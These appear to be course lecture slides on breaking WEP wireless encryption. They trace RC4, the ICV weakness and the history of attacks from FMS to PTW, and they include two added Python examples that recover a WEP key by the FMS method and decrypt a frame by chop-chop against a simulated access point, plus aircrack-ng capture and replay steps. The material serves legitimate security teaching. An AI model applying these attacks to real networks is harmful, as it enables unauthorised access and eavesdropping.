CSC-682 Advanced Computer Security
Attacks on wireless networks using WEP encryption
Presented by: Pompi Rotaru

Wireless technology
- IEEE 802.11 a/b/g/n is the family of standards for wireless LANs (WLANs)
- Wireless use has grown rapidly in recent years
- An attacker can sit outside the building and connect to an unprotected wireless network, or simply listen to any network in range
- Preserving the privacy and integrity of wireless communications is therefore an objective of the network security team
- Basic service set (BSS) types: infrastructure mode (stations talk through an access point) and independent (ad-hoc) mode (stations talk directly to each other)

WEP
- Wired Equivalent Privacy (WEP) is the original 802.11 confidentiality mechanism and was for years the most common protection deployed
- 40-bit secret key plus 24-bit IV (marketed as "64-bit encryption")
- 104-bit secret key plus 24-bit IV (marketed as "128-bit encryption")
- The cipher is RC4, keyed per packet with IV || secret key

History of WEP
- 1997: first final version of IEEE 802.11 released, WEP included
- 2001: WEP broken by Fluhrer, Mantin and Shamir (FMS weak-IV attack)
- 2004: WEP broken again by KoreK (additional key/keystream correlations)
- 2004: KoreK again, the chop-chop attack (decrypts packets without the key)
- 2006: Bittau, Handley and Lackey, the fragmentation attack
- 2007: Pyshkin, Tews and Weinmann (PTW), building on Klein's 2005 analysis of RC4

RC4 algorithm description
- Stream cipher designed by Ron Rivest in 1987
- Variable key size, byte-oriented operations, very cheap in software
- Key Scheduling Algorithm (KSA): turns the key into a permutation S of the 256 byte values, using 256 swap steps driven by the key bytes
- Pseudo-Random Generation Algorithm (PRGA): walks the permutation, swapping two entries per step, and emits one keystream byte per step
- Keystream X = RC4(K) is XORed with the plaintext; the same keystream decrypts

How WEP encryption works
- A 3-byte (24-bit) initialization vector (IV) is chosen per packet
- The per-packet key is IV || secret key K, and the keystream is X = RC4(IV || K)
- A 32-bit CRC-32 checksum, the Integrity Check Value (ICV), is appended to the message to "protect" integrity (it is linear and unkeyed, so it cannot)
- plaintext || ICV is XORed with the keystream
- The IV is sent in the clear, followed by the ciphertext

Types of WEP attacks
- By goal: attacks that decrypt or inject traffic without recovering the WEP key, and attacks that recover the key
- By interaction: static (passive, no communication with the AP) and dynamic (active, involves sending traffic to the AP)

General steps of an attack
- Set up equipment (laptop, wireless card with monitor-mode support, directional antenna)
- Find the target (airodump-ng, Kismet, NetStumbler)
- Capture data from the air (airmon-ng to enable monitor mode, airodump-ng to capture)
- Wait, or make the target network busy by replaying captured ARP requests (aireplay-ng)
- Crack the key from the captured data (aircrack-ng)

The brute-force / dictionary attack
- The "strength" of WEP rests on the difficulty of recovering the secret key by brute force
- A dictionary attack tries a list of likely keys rather than every possible key
- Exhausting the 40-bit key space was estimated at less than a month; the 104-bit key space is out of reach for brute force
- Steps:
  - capture 2 WEP-encrypted packets
  - try to decrypt the first using its IV and a candidate key
  - verify the decrypted ICV (the CRC-32)
  - (optional) confirm the candidate on the 2nd packet

The FMS attack
- 2001: Scott Fluhrer, Itsik Mantin and Adi Shamir
- Static (passive), with key recovery
- RC4 weaknesses exploited:
  - the "invariance weakness": existence of large classes of weak keys
  - the "IV weakness": because the IV is the known prefix of the per-packet key, the attacker can pick packets whose IV leaks one secret key byte into the first keystream byte
- Finding the key: use the key-output correlation (a weak key pattern propagates into the first output byte) together with the known first plaintext byte (the LLC/SNAP header byte 0xAA), and vote for each key byte in turn
- Decision tree over the best-voted candidates
- Requires on the order of 9 million packets (1 to 2 hours of listening on a busy network)
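The weak-IV attack and the decision tree of this slide, as an added worked example in Python (not code from the presentation). It assumes a constructed 40-bit key, and it simulates the capture by keeping, for each IV, only the first ciphertext byte of the frame body; since every 802.11 data frame body starts with the LLC/SNAP byte 0xAA, that byte reveals the first keystream byte. Only the canonical weak-IV class (A+3, 255, X) is "sniffed" here, 1280 frames in all; in real traffic those IVs appear only occasionally, which is why the attack needs millions of packets. The KSA is re-implemented only as far as the attack needs it: the attacker runs the first B steps with the known key prefix (IV plus recovered bytes), keeps the IVs that are "resolved", and votes for K[B]; a depth-first search over the top candidates with a cheap known-plaintext check at the leaves is the decision tree the slide mentions.

```python
from collections import Counter

N = 256
SNAP_DSAP = 0xAA      # every 802.11 data frame body starts with the LLC/SNAP byte 0xAA


def ksa(key, steps=N):
    """RC4 Key Scheduling Algorithm, optionally stopped after `steps` iterations.
    Returns (S, j): the partial state the attacker reconstructs from a known key prefix."""
    S = list(range(N))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) % N
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_first_byte(key):
    """First PRGA output byte under `key`; FMS needs nothing more of the cipher."""
    S, _ = ksa(key)
    i, j = 1, S[1]                                   # PRGA step: i = 1, j = 0 + S[1]
    S[i], S[j] = S[j], S[i]
    return S[(S[i] + S[j]) % N]


def capture(secret, ivs):
    """Constructed stand-in for sniffed traffic: per IV, the attacker keeps only the
    first ciphertext byte of the body, which is 0xAA XOR the first keystream byte."""
    return {iv: rc4_first_byte(iv + secret) ^ SNAP_DSAP for iv in ivs}


def weak_ivs(key_len):
    """The FMS class (A+3, 255, X): IVs that leak secret byte A into the first output."""
    return [bytes((3 + a, 255, x)) for a in range(key_len) for x in range(N)]


def fms_votes(known, captured):
    """Vote for secret byte K[B], B = 3 + len(known) (3 IV bytes, then the recovered
    prefix). Only IVs left 'resolved' after B KSA steps are used; each such IV names
    the right byte with probability about 5 % (e^-3), against 1/256 for a wrong byte."""
    B = 3 + len(known)
    votes = Counter()
    for iv, c0 in captured.items():
        S, j = ksa(iv + known, steps=B)
        x = S[1]
        if x < B and (x + S[x]) % N == B:           # resolved condition
            out = c0 ^ SNAP_DSAP                    # first keystream byte
            votes[(S.index(out) - j - S[B]) % N] += 1
    return votes


def verify(secret, captured, sample=16):
    """Cheap check of a full candidate key against a few captured first bytes."""
    return all(rc4_first_byte(iv + secret) ^ SNAP_DSAP == c0
               for iv, c0 in list(captured.items())[:sample])


def fms_recover(captured, key_len, branch=6):
    """Decision tree: re-vote for every prefix, descend into the top `branch`
    candidates, backtrack when the completed key fails verification."""
    def search(prefix):
        if len(prefix) == key_len:
            return prefix if verify(prefix, captured) else None
        for cand, _ in fms_votes(prefix, captured).most_common(branch):
            found = search(prefix + bytes((cand,)))
            if found is not None:
                return found
        return None
    return search(b"")


DEMO_SECRET = bytes.fromhex("1f2a9c5e07")          # constructed 40-bit WEP key

if __name__ == "__main__":
    traffic = capture(DEMO_SECRET, weak_ivs(len(DEMO_SECRET)))
    print("recovered key:", fms_recover(traffic, len(DEMO_SECRET)).hex())   # 1f2a9c5e07
```

The vote formula K[B] = S^-1[out] - j - S[B] follows from the resolved state: when positions 1, S[1] and B survive the remaining KSA steps (probability roughly e^-3), the first PRGA output is the value swapped into S[B] at step B, whose index was j + S[B] + K[B]. A 104-bit key only adds more bytes to the same loop, so a longer key does not help against this attack.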

The KoreK attack
- 2004: the pseudonymous hacker KoreK
- Static (passive), with key recovery
- Does not need the FMS weak IVs
- Uses 16 additional correlations between the first l bytes of the RC4 key (the IV and the already recovered key bytes), the first 2 bytes of the generated keystream, and the next key byte
- Same decision-tree approach as the FMS attack
- Requires about 700,000 packets

The KoreK chop-chop attack
- 2004: KoreK again
- Dynamic (active); does not recover the key, it decrypts a single packet
- Exploits the ICV: CRC-32 is linear, so a packet can be truncated and its checksum fixed up without knowing the plaintext
- The AP acts as an oracle: it relays a frame whose ICV checks and silently drops one that does not
- Steps:
  - capture one packet
  - chop the last byte and guess its plaintext value (256 possibilities)
  - correct the checksum for that guess and send the truncated packet to the AP
  - if the guess is correct the AP accepts (relays) it, and the guess yields one keystream byte
  - repeat byte by byte until the packet, and the keystream for its IV, is decrypted
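RC4 (KSA and PRGA), WEP framing with the CRC-32 ICV, and the chop-chop attack of this slide, as one added worked example in Python serving the RC4, "How WEP encryption works" and chop-chop slides (not code from the presentation). The key, IV and packet are constructed, and the access point is a simulated object whose only behaviour is accepting or rejecting a frame on its ICV, which is all the attack uses. The 256-entry correction table is not hard-coded: because CRC-32 is affine over GF(2) and every valid body (message || ICV) leaves the CRC register in the same residue, the 4-byte fix-up that turns a chopped body back into a valid one depends only on the plaintext value w of the chopped byte, so the attacker derives D(w) from bodies it builds itself.

```python
import zlib

N = 256


def rc4_keystream(key, length):
    """RC4: the KSA turns the key into a permutation S of 0..255 with 256 key-driven
    swaps; the PRGA then walks S, swapping two entries per step, one output byte per step."""
    S = list(range(N))
    j = 0
    for i in range(N):                                   # KSA
        j = (j + S[i] + key[i % len(key)]) % N
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                              # PRGA
        i = (i + 1) % N
        j = (j + S[i]) % N
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % N])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(data):
    """WEP Integrity Check Value: unkeyed CRC-32, transmitted little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def wep_encrypt(secret, iv, plaintext):
    """Frame body = IV || RC4(IV || secret) XOR (plaintext || ICV)."""
    ks = rc4_keystream(iv + secret, len(plaintext) + 4)
    return iv + xor(plaintext + icv(plaintext), ks)


def wep_decrypt(secret, frame):
    """Plaintext if the ICV checks, else None (what a receiver does with a bad frame)."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4_keystream(iv + secret, len(body)))
    plaintext, tag = data[:-4], data[-4:]
    return plaintext if icv(plaintext) == tag else None


class AccessPoint:
    """The only oracle chop-chop needs: a real AP relays a frame whose ICV checks and
    silently drops one that does not; it never leaks the key."""
    def __init__(self, secret):
        self._secret = secret

    def accepts(self, frame):
        return wep_decrypt(self._secret, frame) is not None


def chop_corrections():
    """For every value w of a chopped last byte, the 4-byte value D(w) that, XORed into
    the new last four bytes, makes the shortened body valid again. Derived from bodies
    we build ourselves; the linearity of CRC-32 makes D depend on w alone."""
    table = {}
    k = 0
    while len(table) < N:
        m = k.to_bytes(2, "big")                          # any 2-byte message
        body = m + icv(m)
        table.setdefault(body[-1], xor(body[-5:-1], icv(m[:-1])))
        k += 1
    return table


def chopchop(ap, frame, nbytes):
    """Recover the last `nbytes` plaintext bytes of frame (IV || ciphertext) with no key:
    chop one byte, try all 256 corrections, keep the one the AP accepts. An accepted
    guess w at position p reveals keystream byte ks[p] = current_body[p] ^ w."""
    table = chop_corrections()
    iv, original = frame[:3], frame[3:]
    body, keystream = original, {}
    for _ in range(nbytes + 4):                          # the first four chops eat the ICV
        p = len(body) - 1
        chopped = body[:-1]
        for w in range(N):
            candidate = chopped[:-4] + xor(chopped[-4:], table[w])
            if ap.accepts(iv + candidate):
                keystream[p] = body[p] ^ w
                body = candidate
                break
        else:
            raise RuntimeError("no guess accepted: the AP is not acting as an oracle")
    start = len(original) - 4 - nbytes
    return bytes(original[p] ^ keystream[p] for p in range(start, len(original) - 4))


DEMO_SECRET = bytes.fromhex("1f2a9c5e07")                # constructed 40-bit WEP key

if __name__ == "__main__":
    ap = AccessPoint(DEMO_SECRET)
    frame = wep_encrypt(DEMO_SECRET, b"\x00\x00\x01", b"\xaa\xaaGET /secret HTTP/1.0")
    print(chopchop(ap, frame, 12))                       # b'ret HTTP/1.0'
```

On the air, the truncated frame is sent to a multicast destination so that the AP re-broadcasts it when the ICV checks; seeing or not seeing that relay is the accept signal. Each accepted guess also fixes one keystream byte for that IV, which is why chop-chop output can be re-used to inject frames, and why a keyed integrity check (a MIC, as in WPA) rather than a longer key is the fix.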

The Bittau fragmentation attack
- 2006: Andrea Bittau, Mark Handley and Joshua Lackey
- Dynamic (active), no key recovery
- 802.11 fragmentation: a packet may be sent as up to 16 fragments, and each fragment is encrypted independently at the MAC layer, so all of them can re-use the same IV and keystream
- Steps:
  - listen to traffic and eavesdrop one packet; its LLC/SNAP header is known plaintext, which yields 8 bytes of keystream
  - 8 keystream bytes are enough for one fragment of 4 data bytes plus ICV; 16 such fragments under one IV carry 64 bytes of attacker-chosen plaintext
  - prepend an IP header to the eavesdropped packet and send it to the AP
  - the AP decrypts and forwards the clear text to an attacker-controlled Internet host
- Fragmentation is used to break 802.11's cryptography without ever recovering the key

The PTW attack
- 2007: Andrei Pyshkin, Erik Tews and Ralf-Philipp Weinmann
- Extends Andreas Klein's analysis of RC4: a "multibyte correlation" between the first l bytes of an RC4 key, the generated keystream, and the next i bytes of the key, so every captured packet casts a vote for every key byte (no weak IVs needed)
- Steps:
  - capture packets and recover their keystreams (ARP packets have a known plaintext prefix; chop-chop or fragmentation can supply keystream where needed)
  - evaluate the multibyte correlation (Klein's) on every packet
  - vote for each key byte (Rk[0], Rk[1], Rk[2] ...) and walk a decision tree over the best candidates
- Requires 35,000 to 40,000 packets
- Less than 60 seconds to crack a 104-bit WEP key

Protecting WEP (none of these is sufficient)
- Increase the key length: only "protects" against brute force, since the cost of the FMS attack grows linearly with the number of key bytes
- Avoid the weak IVs (weak-IV filtering in firmware) and never re-use an IV, which hands the attacker a keystream
- Prevent key re-use: with 802.1X/EAP the WEP key can be changed often (not enough against the Bittau attack, which needs a single packet)
- Deploy an Intrusion Detection System (IDS) to spot injected traffic (the ARP replay that feeds the PTW attack; it cannot see purely passive capture)
- Vendors sold hardware with modified versions of the WEP protocol (e.g. weak-IV avoidance) claiming to be secure

Conclusions
- WEP has a long history of vulnerabilities and "fixes"
- WEP is a good example of how attacks evolve and mature over time
- Attacks that a few years ago took days now take minutes with the right tools
- 2004: WEP officially deprecated by the IEEE 802.11 committee (802.11i)
- 2008: WEP still used by 30% of users in a US university
- Today: too many old networks, some still using WEP
- WEP must be abandoned once and for all rather than patched yet again

Bibliography
http://www.drizzle.com/~aboba/IEEE/rc4_ksaproc.pdf
http://dl.aircrack-ng.org/breakingwepandwpa.pdf
http://eprint.iacr.org/2007/120.pdf
http://tapir.cs.ucl.ac.uk/bittau-wep.pdf
http://www.netstumbler.org/showthread.php?t=12489
http://www.netstumbler.org/showpost.php?p=93942&postcount=35
http://www.pisa.org.hk/event/live-wifi-attack-defense/WEP_cracking_demo.pdf
http://en.wikipedia.org/wiki/Fluhrer,_Mantin,_and_Shamir_attack
http://www.cc.gatech.edu/~traynor/cs8803-f08/slides/lecture13-wep2.pdf
http://www.rossbuffington.com/WEP_Insecurity.pdf
http://www.franken.de/uploads/media/WEP-Cracking.pdf
http://www.quequero.org/How_To_Attack_a_WEP/WPA_Protected_Wireless_Network_(eng)
http://yawcu.sourceforge.net/documentation.pdf
http://eprint.iacr.org/2007/471.pdf